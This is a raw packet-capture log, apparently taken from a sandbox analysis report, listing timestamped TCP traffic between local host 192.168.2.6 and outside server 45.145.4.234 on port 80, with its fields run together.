                                                                                                                                                Oct 6, 2024 22:18:46.601370096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601382971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601409912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601514101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601530075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601540089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601552963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601557970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601564884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601588011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601613998 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601795912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601807117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601816893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601826906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601839066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601839066 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601851940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.601855040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601881981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.601908922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602066040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602071047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602081060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602097988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602103949 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602128983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602431059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602442026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602444887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602449894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602458954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602468014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602471113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602499008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602523088 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602570057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602581024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602596045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602603912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602605104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602617025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602621078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602627993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602638006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602638006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602647066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602658987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602663994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602667093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602669001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602674007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.602686882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.602710009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603039026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603053093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603064060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603065968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603070974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603080034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603085995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603091002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603096008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603101969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603118896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603127003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603143930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603332043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603341103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603373051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603420973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603432894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603441954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603451014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603456974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603463888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603472948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603482008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603482008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603492975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603502989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603516102 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603858948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603869915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603879929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603885889 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603889942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603898048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603900909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603910923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603920937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603924036 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603931904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.603954077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.603970051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604079008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604114056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604219913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604233027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604242086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604252100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604254007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604263067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604273081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604274035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604284048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604293108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604301929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604302883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604314089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604319096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604326010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604337931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604360104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604701996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604713917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604722977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604732990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604738951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604743958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604756117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604765892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604768038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604780912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604792118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604799032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604800940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604810953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.604819059 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.604839087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686335087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686352015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686383963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686394930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686405897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686417103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686429977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686461926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686497927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686500072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686533928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686548948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686559916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686583042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686600924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686687946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686701059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686712027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686723948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686728001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686745882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686774015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.686806917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.686846018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687073946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687098026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687108040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687119007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687136889 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687148094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687257051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687267065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687279940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687290907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687299967 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687326908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687443018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687453985 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687465906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687478065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687482119 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687489986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687510014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687534094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687639952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687652111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687663078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687690973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687719107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687762022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687772036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687788010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687803030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687803030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687813997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687830925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687844992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687912941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687927961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687937975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687948942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687951088 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.687958956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.687973976 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688002110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688049078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688090086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688172102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688188076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688199997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688210011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688220978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688226938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688235044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688246965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688275099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688425064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688436985 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688450098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688461065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688467979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688483000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688508034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688561916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688575029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688591957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688599110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688605070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688618898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688633919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688816071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688826084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688837051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688848019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688858032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688868046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688868999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688879013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688889980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688893080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688905954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688910007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688920021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.688926935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.688956976 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689121008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689150095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689162970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689169884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689187050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689187050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689199924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689209938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689212084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689224958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689241886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689404011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689419031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689429998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689446926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689471006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689635992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689647913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689659119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689668894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689682961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689685106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689693928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689699888 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689704895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689716101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689723015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689728022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689739943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689750910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689790964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.689969063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.689999104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690018892 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690037966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690049887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690083027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690102100 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690115929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690126896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690144062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690154076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690154076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690167904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690179110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690186024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690208912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690556049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690567017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690576077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690587044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690598011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690608025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690618038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690618038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690628052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690630913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690639019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690649986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690658092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690659046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690675020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.690689087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690716028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.690989971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691001892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691013098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691024065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691034079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691032887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691042900 CEST806388545.145.4.234192.168.2.6
